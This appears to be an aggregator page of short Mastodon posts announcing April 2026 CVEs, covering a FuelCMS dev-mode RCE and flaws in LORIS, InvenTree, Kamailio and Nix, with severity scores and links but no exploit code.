(0 None)

EPSS: 0.00%

1 post

N/A

pentesttools@infosec.exchange at 2026-04-09T10:40:19.000Z ##

"It's just dev mode."

PTT-2025-028 / CVE-2026-30461 disagrees. Any authenticated user on a FuelCMS dev instance can drop a PHP shell via git submodule and call it from the browser. One HTTP request. Full RCE. CVSS 8.8 High.

No patch coming. Project's been dormant for almost 4 years.
Found by Raul Bledea and Matei "Mal" Bădănoiu.

Full PoC: pentest-tools.com/research

#offensivesecurity #vulnerabilityresearch

##

CVE-2026-34392
(0 None)

EPSS: 0.03%

1 post

N/A

thehackerwire@mastodon.social at 2026-04-09T06:00:13.000Z ##

🟠 CVE-2026-34392 - High (7.5)

LORIS (Longitudinal Online Research and Imaging System) is a self-hosted web application that provides data- and project-management for neuroimaging research. From 20.0.0 to before 27.0.3 and 28.0.1, a bug in the static file router can allow an at...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-33350
(0 None)

EPSS: 0.03%

1 post

N/A

thehackerwire@mastodon.social at 2026-04-09T06:00:03.000Z ##

🟠 CVE-2026-33350 - High (7.5)

LORIS (Longitudinal Online Research and Imaging System) is a self-hosted web application that provides data- and project-management for neuroimaging research. Prior to 27.0.3 and 28.0.1, a SQL injection has been identified in some code sections fo...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-35169
(0 None)

EPSS: 0.03%

1 post

N/A

thehackerwire@mastodon.social at 2026-04-09T05:15:07.000Z ##

🟠 CVE-2026-35169 - High (8.7)

LORIS (Longitudinal Online Research and Imaging System) is a self-hosted web application that provides data- and project-management for neuroimaging research. From to before 27.0.3 and 28.0.1, the help_editor module of LORIS did not properly sani...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-35446
(0 None)

EPSS: 0.03%

1 post

N/A

thehackerwire@mastodon.social at 2026-04-09T05:14:57.000Z ##

🟠 CVE-2026-35446 - High (7.7)

LORIS (Longitudinal Online Research and Imaging System) is a self-hosted web application that provides data- and project-management for neuroimaging research. From 24.0.0 to before 27.0.3 and 28.0.1, an incorrect order of operations in the FilesDo...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-35478
(0 None)

EPSS: 0.07%

1 post

N/A

thehackerwire@mastodon.social at 2026-04-09T05:01:03.000Z ##

🟠 CVE-2026-35478 - High (8.3)

InvenTree is an Open Source Inventory Management System. From 0.16.0 to before 1.2.7, any authenticated InvenTree user can create a valid API token attributed to any other user in the system — including administrators and superusers — by suppl...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-39863
(0 None)

EPSS: 0.11%

1 post

N/A

thehackerwire@mastodon.social at 2026-04-09T05:00:53.000Z ##

🟠 CVE-2026-39863 - High (7.5)

Kamailio is an open source implementation of a SIP Signaling Server. Prior to 6.1.1, 6.0.6, and 5.8.8, an out-of-bounds access in the core of Kamailio (formerly OpenSER and SER) allows remote attackers to cause a denial of service (process crash) ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-39860
(0 None)

EPSS: 0.02%

1 post

N/A

thehackerwire@mastodon.social at 2026-04-09T05:00:05.000Z ##

🔴 CVE-2026-39860 - Critical (9)

Nix is a package manager for Linux and other Unix systems. A bug in the fix for CVE-2024-27297 allowed for arbitrary overwrites of files writable by the Nix process orchestrating the builds (typically the Nix daemon running as root in multi-user i...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
